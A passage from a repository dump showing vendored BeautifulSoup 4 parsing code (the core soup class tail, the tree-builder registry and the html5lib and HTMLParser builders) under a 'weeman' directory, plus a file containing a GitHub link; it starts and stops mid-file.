317 |         raise NotImplementedError("BeautifulSoup objects don't support insert_after().")
318 | 
319 |     def popTag(self):
320 |         tag = self.tagStack.pop()
321 |         if self.preserve_whitespace_tag_stack and tag == self.preserve_whitespace_tag_stack[-1]:
322 |             self.preserve_whitespace_tag_stack.pop()
323 |         #print "Pop", tag.name
324 |         if self.tagStack:
325 |             self.currentTag = self.tagStack[-1]
326 |         return self.currentTag
327 | 
328 |     def pushTag(self, tag):
329 |         #print "Push", tag.name
330 |         if self.currentTag:
331 |             self.currentTag.contents.append(tag)
332 |         self.tagStack.append(tag)
333 |         self.currentTag = self.tagStack[-1]
334 |         if tag.name in self.builder.preserve_whitespace_tags:
335 |             self.preserve_whitespace_tag_stack.append(tag)
336 | 
337 |     def endData(self, containerClass=NavigableString):
338 |         if self.current_data:
339 |             current_data = u''.join(self.current_data)
340 |             # If whitespace is not preserved, and this string contains
341 |             # nothing but ASCII spaces, replace it with a single space
342 |             # or newline.
343 |             if not self.preserve_whitespace_tag_stack:
344 |                 strippable = True
345 |                 for i in current_data:
346 |                     if i not in self.ASCII_SPACES:
347 |                         strippable = False
348 |                         break
349 |                 if strippable:
350 |                     if '\n' in current_data:
351 |                         current_data = '\n'
352 |                     else:
353 |                         current_data = ' '
354 | 
355 |             # Reset the data collector.
356 |             self.current_data = []
357 | 
358 |             # Should we add this string to the tree at all?
359 |             if self.parse_only and len(self.tagStack) <= 1 and \
360 |                    (not self.parse_only.text or \
361 |                     not self.parse_only.search(current_data)):
362 |                 return
363 | 
364 |             o = containerClass(current_data)
365 |             self.object_was_parsed(o)
366 | 
367 |     def object_was_parsed(self, o, parent=None, most_recent_element=None):
368 |         """Add an object to the parse tree."""
369 |         parent = parent or self.currentTag
370 |         previous_element = most_recent_element or self._most_recent_element
371 | 
372 |         next_element = previous_sibling = next_sibling = None
373 |         if isinstance(o, Tag):
374 |             next_element = o.next_element
375 |             next_sibling = o.next_sibling
376 |             previous_sibling = o.previous_sibling
377 |             if not previous_element:
378 |                 previous_element = o.previous_element
379 | 
380 |         o.setup(parent, previous_element, next_element, previous_sibling, next_sibling)
381 | 
382 |         self._most_recent_element = o
383 |         parent.contents.append(o)
384 | 
385 |         if parent.next_sibling:
386 |             # This node is being inserted into an element that has
387 |             # already been parsed. Deal with any dangling references.
388 |             index = len(parent.contents)-1
389 |             while index >= 0:
390 |                 if parent.contents[index] is o:
391 |                     break
392 |                 index -= 1
393 |             else:
394 |                 raise ValueError(
395 |                     "Error building tree: supposedly %r was inserted "
396 |                     "into %r after the fact, but I don't see it!" % (
397 |                         o, parent
398 |                     )
399 |                 )
400 |             if index == 0:
401 |                 previous_element = parent
402 |                 previous_sibling = None
403 |             else:
404 |                 previous_element = previous_sibling = parent.contents[index-1]
405 |             if index == len(parent.contents)-1:
406 |                 next_element = parent.next_sibling
407 |                 next_sibling = None
408 |             else:
409 |                 next_element = next_sibling = parent.contents[index+1]
410 | 
411 |             o.previous_element = previous_element
412 |             if previous_element:
413 |                 previous_element.next_element = o
414 |             o.next_element = next_element
415 |             if next_element:
416 |                 next_element.previous_element = o
417 |             o.next_sibling = next_sibling
418 |             if next_sibling:
419 |                 next_sibling.previous_sibling = o
420 |             o.previous_sibling = previous_sibling
421 |             if previous_sibling:
422 |                 previous_sibling.next_sibling = o
423 | 
424 |     def _popToTag(self, name, nsprefix=None, inclusivePop=True):
425 |         """Pops the tag stack up to and including the most recent
426 |         instance of the given tag. If inclusivePop is false, pops the tag
427 |         stack up to but *not* including the most recent instqance of
428 |         the given tag."""
429 |         #print "Popping to %s" % name
430 |         if name == self.ROOT_TAG_NAME:
431 |             # The BeautifulSoup object itself can never be popped.
432 |             return
433 | 
434 |         most_recently_popped = None
435 | 
436 |         stack_size = len(self.tagStack)
437 |         for i in range(stack_size - 1, 0, -1):
438 |             t = self.tagStack[i]
439 |             if (name == t.name and nsprefix == t.prefix):
440 |                 if inclusivePop:
441 |                     most_recently_popped = self.popTag()
442 |                 break
443 |             most_recently_popped = self.popTag()
444 | 
445 |         return most_recently_popped
446 | 
447 |     def handle_starttag(self, name, namespace, nsprefix, attrs):
448 |         """Push a start tag on to the stack.
449 | 
450 |         If this method returns None, the tag was rejected by the
451 |         SoupStrainer. You should proceed as if the tag had not occurred
452 |         in the document. For instance, if this was a self-closing tag,
453 |         don't call handle_endtag.
454 |         """
455 | 
456 |         # print "Start tag %s: %s" % (name, attrs)
457 |         self.endData()
458 | 
459 |         if (self.parse_only and len(self.tagStack) <= 1
460 |             and (self.parse_only.text
461 |                  or not self.parse_only.search_tag(name, attrs))):
462 |             return None
463 | 
464 |         tag = Tag(self, self.builder, name, namespace, nsprefix, attrs,
465 |                   self.currentTag, self._most_recent_element)
466 |         if tag is None:
467 |             return tag
468 |         if self._most_recent_element:
469 |             self._most_recent_element.next_element = tag
470 |         self._most_recent_element = tag
471 |         self.pushTag(tag)
472 |         return tag
473 | 
474 |     def handle_endtag(self, name, nsprefix=None):
475 |         #print "End tag: " + name
476 |         self.endData()
477 |         self._popToTag(name, nsprefix)
478 | 
479 |     def handle_data(self, data):
480 |         self.current_data.append(data)
481 | 
482 |     def decode(self, pretty_print=False,
483 |                eventual_encoding=DEFAULT_OUTPUT_ENCODING,
484 |                formatter="minimal"):
485 |         """Returns a string or Unicode representation of this document.
486 |         To get Unicode, pass None for encoding."""
487 | 
488 |         if self.is_xml:
489 |             # Print the XML declaration
490 |             encoding_part = ''
491 |             if eventual_encoding != None:
492 |                 encoding_part = ' encoding="%s"' % eventual_encoding
493 |             prefix = u'<?xml version="1.0"%s?>\n' % encoding_part
494 |         else:
495 |             prefix = u''
496 |         if not pretty_print:
497 |             indent_level = None
498 |         else:
499 |             indent_level = 0
500 |         return prefix + super(BeautifulSoup, self).decode(
501 |             indent_level, eventual_encoding, formatter)
502 | 
503 | # Alias to make it easier to type import: 'from bs4 import _soup'
504 | _s = BeautifulSoup
505 | _soup = BeautifulSoup
506 | 
507 | class BeautifulStoneSoup(BeautifulSoup):
508 |     """Deprecated interface to an XML parser."""
509 | 
510 |     def __init__(self, *args, **kwargs):
511 |         kwargs['features'] = 'xml'
512 |         warnings.warn(
513 |             'The BeautifulStoneSoup class is deprecated. Instead of using '
514 |             'it, pass features="xml" into the BeautifulSoup constructor.')
515 |         super(BeautifulStoneSoup, self).__init__(*args, **kwargs)
516 | 
517 | 
518 | class StopParsing(Exception):
519 |     pass
520 | 
521 | class FeatureNotFound(ValueError):
522 |     pass
523 | 
524 | 
525 | #By default, act as an HTML pretty-printer.
526 | if __name__ == '__main__':
527 |     import sys
528 |     soup = BeautifulSoup(sys.stdin)
529 |     print soup.prettify()
530 | 


--------------------------------------------------------------------------------
/weeman/lib/bs4/builder/0.txt:
--------------------------------------------------------------------------------
1 | https://github.com/GottModusTermux/
2 | 


--------------------------------------------------------------------------------
/weeman/lib/bs4/builder/__init__.py:
--------------------------------------------------------------------------------
  1 | # Use of this source code is governed by a BSD-style license that can be
  2 | # found in the LICENSE file.
  3 | 
  4 | from collections import defaultdict
  5 | import itertools
  6 | import sys
  7 | from lib.bs4.element import (
  8 |     CharsetMetaAttributeValue,
  9 |     ContentMetaAttributeValue,
 10 |     HTMLAwareEntitySubstitution,
 11 |     whitespace_re
 12 |     )
 13 | 
 14 | __all__ = [
 15 |     'HTMLTreeBuilder',
 16 |     'SAXTreeBuilder',
 17 |     'TreeBuilder',
 18 |     'TreeBuilderRegistry',
 19 |     ]
 20 | 
 21 | # Some useful features for a TreeBuilder to have.
 22 | FAST = 'fast'
 23 | PERMISSIVE = 'permissive'
 24 | STRICT = 'strict'
 25 | XML = 'xml'
 26 | HTML = 'html'
 27 | HTML_5 = 'html5'
 28 | 
 29 | 
 30 | class TreeBuilderRegistry(object):
 31 | 
 32 |     def __init__(self):
 33 |         self.builders_for_feature = defaultdict(list)
 34 |         self.builders = []
 35 | 
 36 |     def register(self, treebuilder_class):
 37 |         """Register a treebuilder based on its advertised features."""
 38 |         for feature in treebuilder_class.features:
 39 |             self.builders_for_feature[feature].insert(0, treebuilder_class)
 40 |         self.builders.insert(0, treebuilder_class)
 41 | 
 42 |     def lookup(self, *features):
 43 |         if len(self.builders) == 0:
 44 |             # There are no builders at all.
 45 |             return None
 46 | 
 47 |         if len(features) == 0:
 48 |             # They didn't ask for any features. Give them the most
 49 |             # recently registered builder.
 50 |             return self.builders[0]
 51 | 
 52 |         # Go down the list of features in order, and eliminate any builders
 53 |         # that don't match every feature.
 54 |         features = list(features)
 55 |         features.reverse()
 56 |         candidates = None
 57 |         candidate_set = None
 58 |         while len(features) > 0:
 59 |             feature = features.pop()
 60 |             we_have_the_feature = self.builders_for_feature.get(feature, [])
 61 |             if len(we_have_the_feature) > 0:
 62 |                 if candidates is None:
 63 |                     candidates = we_have_the_feature
 64 |                     candidate_set = set(candidates)
 65 |                 else:
 66 |                     # Eliminate any candidates that don't have this feature.
 67 |                     candidate_set = candidate_set.intersection(
 68 |                         set(we_have_the_feature))
 69 | 
 70 |         # The only valid candidates are the ones in candidate_set.
 71 |         # Go through the original list of candidates and pick the first one
 72 |         # that's in candidate_set.
 73 |         if candidate_set is None:
 74 |             return None
 75 |         for candidate in candidates:
 76 |             if candidate in candidate_set:
 77 |                 return candidate
 78 |         return None
 79 | 
 80 | # The BeautifulSoup class will take feature lists from developers and use them
 81 | # to look up builders in this registry.
 82 | builder_registry = TreeBuilderRegistry()
 83 | 
 84 | class TreeBuilder(object):
 85 |     """Turn a document into a Beautiful Soup object tree."""
 86 | 
 87 |     NAME = "[Unknown tree builder]"
 88 |     ALTERNATE_NAMES = []
 89 |     features = []
 90 | 
 91 |     is_xml = False
 92 |     picklable = False
 93 |     preserve_whitespace_tags = set()
 94 |     empty_element_tags = None # A tag will be considered an empty-element
 95 |                               # tag when and only when it has no contents.
 96 | 
 97 |     # A value for these tag/attribute combinations is a space- or
 98 |     # comma-separated list of CDATA, rather than a single CDATA.
 99 |     cdata_list_attributes = {}
100 | 
101 | 
102 |     def __init__(self):
103 |         self.soup = None
104 | 
105 |     def reset(self):
106 |         pass
107 | 
108 |     def can_be_empty_element(self, tag_name):
109 |         """Might a tag with this name be an empty-element tag?
110 | 
111 |         The final markup may or may not actually present this tag as
112 |         self-closing.
113 | 
114 |         For instance: an HTMLBuilder does not consider a <p> tag to be
115 |         an empty-element tag (it's not in
116 |         HTMLBuilder.empty_element_tags). This means an empty <p> tag
117 |         will be presented as "<p></p>", not "<p />".
118 | 
119 |         The default implementation has no opinion about which tags are
120 |         empty-element tags, so a tag will be presented as an
121 |         empty-element tag if and only if it has no contents.
122 |         "<foo></foo>" will become "<foo />", and "<foo>bar</foo>" will
123 |         be left alone.
124 |         """
125 |         if self.empty_element_tags is None:
126 |             return True
127 |         return tag_name in self.empty_element_tags
128 | 
129 |     def feed(self, markup):
130 |         raise NotImplementedError()
131 | 
132 |     def prepare_markup(self, markup, user_specified_encoding=None,
133 |                        document_declared_encoding=None):
134 |         return markup, None, None, False
135 | 
136 |     def test_fragment_to_document(self, fragment):
137 |         """Wrap an HTML fragment to make it look like a document.
138 | 
139 |         Different parsers do this differently. For instance, lxml
140 |         introduces an empty <head> tag, and html5lib
141 |         doesn't. Abstracting this away lets us write simple tests
142 |         which run HTML fragments through the parser and compare the
143 |         results against other HTML fragments.
144 | 
145 |         This method should not be used outside of tests.
146 |         """
147 |         return fragment
148 | 
149 |     def set_up_substitutions(self, tag):
150 |         return False
151 | 
152 |     def _replace_cdata_list_attribute_values(self, tag_name, attrs):
153 |         """Replaces class="foo bar" with class=["foo", "bar"]
154 | 
155 |         Modifies its input in place.
156 |         """
157 |         if not attrs:
158 |             return attrs
159 |         if self.cdata_list_attributes:
160 |             universal = self.cdata_list_attributes.get('*', [])
161 |             tag_specific = self.cdata_list_attributes.get(
162 |                 tag_name.lower(), None)
163 |             for attr in attrs.keys():
164 |                 if attr in universal or (tag_specific and attr in tag_specific):
165 |                     # We have a "class"-type attribute whose string
166 |                     # value is a whitespace-separated list of
167 |                     # values. Split it into a list.
168 |                     value = attrs[attr]
169 |                     if isinstance(value, basestring):
170 |                         values = whitespace_re.split(value)
171 |                     else:
172 |                         # html5lib sometimes calls setAttributes twice
173 |                         # for the same tag when rearranging the parse
174 |                         # tree. On the second call the attribute value
175 |                         # here is already a list.  If this happens,
176 |                         # leave the value alone rather than trying to
177 |                         # split it again.
178 |                         values = value
179 |                     attrs[attr] = values
180 |         return attrs
181 | 
182 | class SAXTreeBuilder(TreeBuilder):
183 |     """A Beautiful Soup treebuilder that listens for SAX events."""
184 | 
185 |     def feed(self, markup):
186 |         raise NotImplementedError()
187 | 
188 |     def close(self):
189 |         pass
190 | 
191 |     def startElement(self, name, attrs):
192 |         attrs = dict((key[1], value) for key, value in list(attrs.items()))
193 |         #print "Start %s, %r" % (name, attrs)
194 |         self.soup.handle_starttag(name, attrs)
195 | 
196 |     def endElement(self, name):
197 |         #print "End %s" % name
198 |         self.soup.handle_endtag(name)
199 | 
200 |     def startElementNS(self, nsTuple, nodeName, attrs):
201 |         # Throw away (ns, nodeName) for now.
202 |         self.startElement(nodeName, attrs)
203 | 
204 |     def endElementNS(self, nsTuple, nodeName):
205 |         # Throw away (ns, nodeName) for now.
206 |         self.endElement(nodeName)
207 |         #handler.endElementNS((ns, node.nodeName), node.nodeName)
208 | 
209 |     def startPrefixMapping(self, prefix, nodeValue):
210 |         # Ignore the prefix for now.
211 |         pass
212 | 
213 |     def endPrefixMapping(self, prefix):
214 |         # Ignore the prefix for now.
215 |         # handler.endPrefixMapping(prefix)
216 |         pass
217 | 
218 |     def characters(self, content):
219 |         self.soup.handle_data(content)
220 | 
221 |     def startDocument(self):
222 |         pass
223 | 
224 |     def endDocument(self):
225 |         pass
226 | 
227 | 
228 | class HTMLTreeBuilder(TreeBuilder):
229 |     """This TreeBuilder knows facts about HTML.
230 | 
231 |     Such as which tags are empty-element tags.
232 |     """
233 | 
234 |     preserve_whitespace_tags = HTMLAwareEntitySubstitution.preserve_whitespace_tags
235 |     empty_element_tags = set(['br' , 'hr', 'input', 'img', 'meta',
236 |                               'spacer', 'link', 'frame', 'base'])
237 | 
238 |     # The HTML standard defines these attributes as containing a
239 |     # space-separated list of values, not a single value. That is,
240 |     # class="foo bar" means that the 'class' attribute has two values,
241 |     # 'foo' and 'bar', not the single value 'foo bar'.  When we
242 |     # encounter one of these attributes, we will parse its value into
243 |     # a list of values if possible. Upon output, the list will be
244 |     # converted back into a string.
245 |     cdata_list_attributes = {
246 |         "*" : ['class', 'accesskey', 'dropzone'],
247 |         "a" : ['rel', 'rev'],
248 |         "link" :  ['rel', 'rev'],
249 |         "td" : ["headers"],
250 |         "th" : ["headers"],
251 |         "td" : ["headers"],
252 |         "form" : ["accept-charset"],
253 |         "object" : ["archive"],
254 | 
255 |         # These are HTML5 specific, as are *.accesskey and *.dropzone above.
256 |         "area" : ["rel"],
257 |         "icon" : ["sizes"],
258 |         "iframe" : ["sandbox"],
259 |         "output" : ["for"],
260 |         }
261 | 
262 |     def set_up_substitutions(self, tag):
263 |         # We are only interested in <meta> tags
264 |         if tag.name != 'meta':
265 |             return False
266 | 
267 |         http_equiv = tag.get('http-equiv')
268 |         content = tag.get('content')
269 |         charset = tag.get('charset')
270 | 
271 |         # We are interested in <meta> tags that say what encoding the
272 |         # document was originally in. This means HTML 5-style <meta>
273 |         # tags that provide the "charset" attribute. It also means
274 |         # HTML 4-style <meta> tags that provide the "content"
275 |         # attribute and have "http-equiv" set to "content-type".
276 |         #
277 |         # In both cases we will replace the value of the appropriate
278 |         # attribute with a standin object that can take on any
279 |         # encoding.
280 |         meta_encoding = None
281 |         if charset is not None:
282 |             # HTML 5 style:
283 |             # <meta charset="utf8">
284 |             meta_encoding = charset
285 |             tag['charset'] = CharsetMetaAttributeValue(charset)
286 | 
287 |         elif (content is not None and http_equiv is not None
288 |               and http_equiv.lower() == 'content-type'):
289 |             # HTML 4 style:
290 |             # <meta http-equiv="content-type" content="text/html; charset=utf8">
291 |             tag['content'] = ContentMetaAttributeValue(content)
292 | 
293 |         return (meta_encoding is not None)
294 | 
295 | def register_treebuilders_from(module):
296 |     """Copy TreeBuilders from the given module into this module."""
297 |     # I'm fairly sure this is not the best way to do this.
298 |     this_module = sys.modules['lib.bs4.builder']
299 |     for name in module.__all__:
300 |         obj = getattr(module, name)
301 | 
302 |         if issubclass(obj, TreeBuilder):
303 |             setattr(this_module, name, obj)
304 |             this_module.__all__.append(name)
305 |             # Register the builder while we're at it.
306 |             this_module.builder_registry.register(obj)
307 | 
308 | class ParserRejectedMarkup(Exception):
309 |     pass
310 | 
311 | # Builders are registered in reverse order of priority, so that custom
312 | # builder registrations will take precedence. In general, we want lxml
313 | # to take precedence over html5lib, because it's faster. And we only
314 | # want to use HTMLParser as a last result.
315 | from . import _htmlparser
316 | register_treebuilders_from(_htmlparser)
317 | try:
318 |     from . import _html5lib
319 |     register_treebuilders_from(_html5lib)
320 | except ImportError:
321 |     # They don't have html5lib installed.
322 |     pass
323 | try:
324 |     from . import _lxml
325 |     register_treebuilders_from(_lxml)
326 | except ImportError:
327 |     # They don't have lxml installed.
328 |     pass
329 | 


--------------------------------------------------------------------------------
/weeman/lib/bs4/builder/_html5lib.py:
--------------------------------------------------------------------------------
  1 | # Use of this source code is governed by a BSD-style license that can be
  2 | # found in the LICENSE file.
  3 | 
  4 | __all__ = [
  5 |     'HTML5TreeBuilder',
  6 |     ]
  7 | 
  8 | import warnings
  9 | from lib.bs4.builder import (
 10 |     PERMISSIVE,
 11 |     HTML,
 12 |     HTML_5,
 13 |     HTMLTreeBuilder,
 14 |     )
 15 | from lib.bs4.element import (
 16 |     NamespacedAttribute,
 17 |     whitespace_re,
 18 | )
 19 | import lib.html5lib
 20 | from html5lib.constants import namespaces
 21 | from lib.bs4.element import (
 22 |     Comment,
 23 |     Doctype,
 24 |     NavigableString,
 25 |     Tag,
 26 |     )
 27 | 
 28 | try:
 29 |     # Pre-0.99999999
 30 |     from html5lib.treebuilders import _base as treebuilder_base
 31 |     new_html5lib = False
 32 | except ImportError, e:
 33 |     # 0.99999999 and up
 34 |     from html5lib.treebuilders import base as treebuilder_base
 35 |     new_html5lib = True
 36 | 
 37 | class HTML5TreeBuilder(HTMLTreeBuilder):
 38 |     """Use html5lib to build a tree."""
 39 | 
 40 |     NAME = "html5lib"
 41 | 
 42 |     features = [NAME, PERMISSIVE, HTML_5, HTML]
 43 | 
 44 |     def prepare_markup(self, markup, user_specified_encoding,
 45 |                        document_declared_encoding=None, exclude_encodings=None):
 46 |         # Store the user-specified encoding for use later on.
 47 |         self.user_specified_encoding = user_specified_encoding
 48 | 
 49 |         # document_declared_encoding and exclude_encodings aren't used
 50 |         # ATM because the html5lib TreeBuilder doesn't use
 51 |         # UnicodeDammit.
 52 |         if exclude_encodings:
 53 |             warnings.warn("You provided a value for exclude_encoding, but the html5lib tree builder doesn't support exclude_encoding.")
 54 |         yield (markup, None, None, False)
 55 | 
 56 |     # These methods are defined by Beautiful Soup.
 57 |     def feed(self, markup):
 58 |         if self.soup.parse_only is not None:
 59 |             warnings.warn("You provided a value for parse_only, but the html5lib tree builder doesn't support parse_only. The entire document will be parsed.")
 60 |         parser = html5lib.HTMLParser(tree=self.create_treebuilder)
 61 | 
 62 |         extra_kwargs = dict()
 63 |         if not isinstance(markup, unicode):
 64 |             if new_html5lib:
 65 |                 extra_kwargs['override_encoding'] = self.user_specified_encoding
 66 |             else:
 67 |                 extra_kwargs['encoding'] = self.user_specified_encoding
 68 |         doc = parser.parse(markup, **extra_kwargs)
 69 | 
 70 |         # Set the character encoding detected by the tokenizer.
 71 |         if isinstance(markup, unicode):
 72 |             # We need to special-case this because html5lib sets
 73 |             # charEncoding to UTF-8 if it gets Unicode input.
 74 |             doc.original_encoding = None
 75 |         else:
 76 |             original_encoding = parser.tokenizer.stream.charEncoding[0]
 77 |             if not isinstance(original_encoding, basestring):
 78 |                 # In 0.99999999 and up, the encoding is an html5lib
 79 |                 # Encoding object. We want to use a string for compatibility
 80 |                 # with other tree builders.
 81 |                 original_encoding = original_encoding.name
 82 |             doc.original_encoding = original_encoding
 83 | 
 84 |     def create_treebuilder(self, namespaceHTMLElements):
 85 |         self.underlying_builder = TreeBuilderForHtml5lib(
 86 |             self.soup, namespaceHTMLElements)
 87 |         return self.underlying_builder
 88 | 
 89 |     def test_fragment_to_document(self, fragment):
 90 |         """See `TreeBuilder`."""
 91 |         return u'<html><head></head><body>%s</body></html>' % fragment
 92 | 
 93 | 
 94 | class TreeBuilderForHtml5lib(treebuilder_base.TreeBuilder):
 95 | 
 96 |     def __init__(self, soup, namespaceHTMLElements):
 97 |         self.soup = soup
 98 |         super(TreeBuilderForHtml5lib, self).__init__(namespaceHTMLElements)
 99 | 
100 |     def documentClass(self):
101 |         self.soup.reset()
102 |         return Element(self.soup, self.soup, None)
103 | 
104 |     def insertDoctype(self, token):
105 |         name = token["name"]
106 |         publicId = token["publicId"]
107 |         systemId = token["systemId"]
108 | 
109 |         doctype = Doctype.for_name_and_ids(name, publicId, systemId)
110 |         self.soup.object_was_parsed(doctype)
111 | 
112 |     def elementClass(self, name, namespace):
113 |         tag = self.soup.new_tag(name, namespace)
114 |         return Element(tag, self.soup, namespace)
115 | 
116 |     def commentClass(self, data):
117 |         return TextNode(Comment(data), self.soup)
118 | 
119 |     def fragmentClass(self):
120 |         self.soup = BeautifulSoup("")
121 |         self.soup.name = "[document_fragment]"
122 |         return Element(self.soup, self.soup, None)
123 | 
124 |     def appendChild(self, node):
125 |         # XXX This code is not covered by the BS4 tests.
126 |         self.soup.append(node.element)
127 | 
128 |     def getDocument(self):
129 |         return self.soup
130 | 
131 |     def getFragment(self):
132 |         return treebuilder_base.TreeBuilder.getFragment(self).element
133 | 
134 | class AttrList(object):
135 |     def __init__(self, element):
136 |         self.element = element
137 |         self.attrs = dict(self.element.attrs)
138 |     def __iter__(self):
139 |         return list(self.attrs.items()).__iter__()
140 |     def __setitem__(self, name, value):
141 |         # If this attribute is a multi-valued attribute for this element,
142 |         # turn its value into a list.
143 |         list_attr = HTML5TreeBuilder.cdata_list_attributes
144 |         if (name in list_attr['*']
145 |             or (self.element.name in list_attr
146 |                 and name in list_attr[self.element.name])):
147 |             # A node that is being cloned may have already undergone
148 |             # this procedure.
149 |             if not isinstance(value, list):
150 |                 value = whitespace_re.split(value)
151 |         self.element[name] = value
152 |     def items(self):
153 |         return list(self.attrs.items())
154 |     def keys(self):
155 |         return list(self.attrs.keys())
156 |     def __len__(self):
157 |         return len(self.attrs)
158 |     def __getitem__(self, name):
159 |         return self.attrs[name]
160 |     def __contains__(self, name):
161 |         return name in list(self.attrs.keys())
162 | 
163 | 
164 | class Element(treebuilder_base.Node):
165 |     def __init__(self, element, soup, namespace):
166 |         treebuilder_base.Node.__init__(self, element.name)
167 |         self.element = element
168 |         self.soup = soup
169 |         self.namespace = namespace
170 | 
171 |     def appendChild(self, node):
172 |         string_child = child = None
173 |         if isinstance(node, basestring):
174 |             # Some other piece of code decided to pass in a string
175 |             # instead of creating a TextElement object to contain the
176 |             # string.
177 |             string_child = child = node
178 |         elif isinstance(node, Tag):
179 |             # Some other piece of code decided to pass in a Tag
180 |             # instead of creating an Element object to contain the
181 |             # Tag.
182 |             child = node
183 |         elif node.element.__class__ == NavigableString:
184 |             string_child = child = node.element
185 |         else:
186 |             child = node.element
187 | 
188 |         if not isinstance(child, basestring) and child.parent is not None:
189 |             node.element.extract()
190 | 
191 |         if (string_child and self.element.contents
192 |             and self.element.contents[-1].__class__ == NavigableString):
193 |             # We are appending a string onto another string.
194 |             # TODO This has O(n^2) performance, for input like
195 |             # "a</a>a</a>a</a>..."
196 |             old_element = self.element.contents[-1]
197 |             new_element = self.soup.new_string(old_element + string_child)
198 |             old_element.replace_with(new_element)
199 |             self.soup._most_recent_element = new_element
200 |         else:
201 |             if isinstance(node, basestring):
202 |                 # Create a brand new NavigableString from this string.
203 |                 child = self.soup.new_string(node)
204 | 
205 |             # Tell Beautiful Soup to act as if it parsed this element
206 |             # immediately after the parent's last descendant. (Or
207 |             # immediately after the parent, if it has no children.)
208 |             if self.element.contents:
209 |                 most_recent_element = self.element._last_descendant(False)
210 |             elif self.element.next_element is not None:
211 |                 # Something from further ahead in the parse tree is
212 |                 # being inserted into this earlier element. This is
213 |                 # very annoying because it means an expensive search
214 |                 # for the last element in the tree.
215 |                 most_recent_element = self.soup._last_descendant()
216 |             else:
217 |                 most_recent_element = self.element
218 | 
219 |             self.soup.object_was_parsed(
220 |                 child, parent=self.element,
221 |                 most_recent_element=most_recent_element)
222 | 
223 |     def getAttributes(self):
224 |         return AttrList(self.element)
225 | 
226 |     def setAttributes(self, attributes):
227 | 
228 |         if attributes is not None and len(attributes) > 0:
229 | 
230 |             converted_attributes = []
231 |             for name, value in list(attributes.items()):
232 |                 if isinstance(name, tuple):
233 |                     new_name = NamespacedAttribute(*name)
234 |                     del attributes[name]
235 |                     attributes[new_name] = value
236 | 
237 |             self.soup.builder._replace_cdata_list_attribute_values(
238 |                 self.name, attributes)
239 |             for name, value in attributes.items():
240 |                 self.element[name] = value
241 | 
242 |             # The attributes may contain variables that need substitution.
243 |             # Call set_up_substitutions manually.
244 |             #
245 |             # The Tag constructor called this method when the Tag was created,
246 |             # but we just set/changed the attributes, so call it again.
247 |             self.soup.builder.set_up_substitutions(self.element)
248 |     attributes = property(getAttributes, setAttributes)
249 | 
250 |     def insertText(self, data, insertBefore=None):
251 |         if insertBefore:
252 |             text = TextNode(self.soup.new_string(data), self.soup)
253 |             self.insertBefore(data, insertBefore)
254 |         else:
255 |             self.appendChild(data)
256 | 
257 |     def insertBefore(self, node, refNode):
258 |         index = self.element.index(refNode.element)
259 |         if (node.element.__class__ == NavigableString and self.element.contents
260 |             and self.element.contents[index-1].__class__ == NavigableString):
261 |             # (See comments in appendChild)
262 |             old_node = self.element.contents[index-1]
263 |             new_str = self.soup.new_string(old_node + node.element)
264 |             old_node.replace_with(new_str)
265 |         else:
266 |             self.element.insert(index, node.element)
267 |             node.parent = self
268 | 
269 |     def removeChild(self, node):
270 |         node.element.extract()
271 | 
272 |     def reparentChildren(self, new_parent):
273 |         """Move all of this tag's children into another tag."""
274 |         # print "MOVE", self.element.contents
275 |         # print "FROM", self.element
276 |         # print "TO", new_parent.element
277 |         element = self.element
278 |         new_parent_element = new_parent.element
279 |         # Determine what this tag's next_element will be once all the children
280 |         # are removed.
281 |         final_next_element = element.next_sibling
282 | 
283 |         new_parents_last_descendant = new_parent_element._last_descendant(False, False)
284 |         if len(new_parent_element.contents) > 0:
285 |             # The new parent already contains children. We will be
286 |             # appending this tag's children to the end.
287 |             new_parents_last_child = new_parent_element.contents[-1]
288 |             new_parents_last_descendant_next_element = new_parents_last_descendant.next_element
289 |         else:
290 |             # The new parent contains no children.
291 |             new_parents_last_child = None
292 |             new_parents_last_descendant_next_element = new_parent_element.next_element
293 | 
294 |         to_append = element.contents
295 |         append_after = new_parent_element.contents
296 |         if len(to_append) > 0:
297 |             # Set the first child's previous_element and previous_sibling
298 |             # to elements within the new parent
299 |             first_child = to_append[0]
300 |             if new_parents_last_descendant:
301 |                 first_child.previous_element = new_parents_last_descendant
302 |             else:
303 |                 first_child.previous_element = new_parent_element
304 |             first_child.previous_sibling = new_parents_last_child
305 |             if new_parents_last_descendant:
306 |                 new_parents_last_descendant.next_element = first_child
307 |             else:
308 |                 new_parent_element.next_element = first_child
309 |             if new_parents_last_child:
310 |                 new_parents_last_child.next_sibling = first_child
311 | 
312 |             # Fix the last child's next_element and next_sibling
313 |             last_child = to_append[-1]
314 |             last_child.next_element = new_parents_last_descendant_next_element
315 |             if new_parents_last_descendant_next_element:
316 |                 new_parents_last_descendant_next_element.previous_element = last_child
317 |             last_child.next_sibling = None
318 | 
319 |         for child in to_append:
320 |             child.parent = new_parent_element
321 |             new_parent_element.contents.append(child)
322 | 
323 |         # Now that this element has no children, change its .next_element.
324 |         element.contents = []
325 |         element.next_element = final_next_element
326 | 
327 |         # print "DONE WITH MOVE"
328 |         # print "FROM", self.element
329 |         # print "TO", new_parent_element
330 | 
331 |     def cloneNode(self):
332 |         tag = self.soup.new_tag(self.element.name, self.namespace)
333 |         node = Element(tag, self.soup, self.namespace)
334 |         for key,value in self.attributes:
335 |             node.attributes[key] = value
336 |         return node
337 | 
338 |     def hasContent(self):
339 |         return self.element.contents
340 | 
341 |     def getNameTuple(self):
342 |         if self.namespace == None:
343 |             return namespaces["html"], self.name
344 |         else:
345 |             return self.namespace, self.name
346 | 
347 |     nameTuple = property(getNameTuple)
348 | 
349 | class TextNode(Element):
350 |     def __init__(self, element, soup):
351 |         treebuilder_base.Node.__init__(self, None)
352 |         self.element = element
353 |         self.soup = soup
354 | 
355 |     def cloneNode(self):
356 |         raise NotImplementedError
357 | 


--------------------------------------------------------------------------------
/weeman/lib/bs4/builder/_htmlparser.py:
--------------------------------------------------------------------------------
  1 | """Use the HTMLParser library to parse HTML files that aren't too bad."""
  2 | 
  3 | # Use of this source code is governed by a BSD-style license that can be
  4 | # found in the LICENSE file.
  5 | 
  6 | __all__ = [
  7 |     'HTMLParserTreeBuilder',
  8 |     ]
  9 | 
 10 | from HTMLParser import HTMLParser
 11 | 
 12 | try:
 13 |     from HTMLParser import HTMLParseError
 14 | except ImportError, e:
 15 |     # HTMLParseError is removed in Python 3.5. Since it can never be
 16 |     # thrown in 3.5, we can just define our own class as a placeholder.
 17 |     class HTMLParseError(Exception):
 18 |         pass
 19 | 
 20 | import sys
 21 | import warnings
 22 | 
 23 | # Starting in Python 3.2, the HTMLParser constructor takes a 'strict'
 24 | # argument, which we'd like to set to False. Unfortunately,
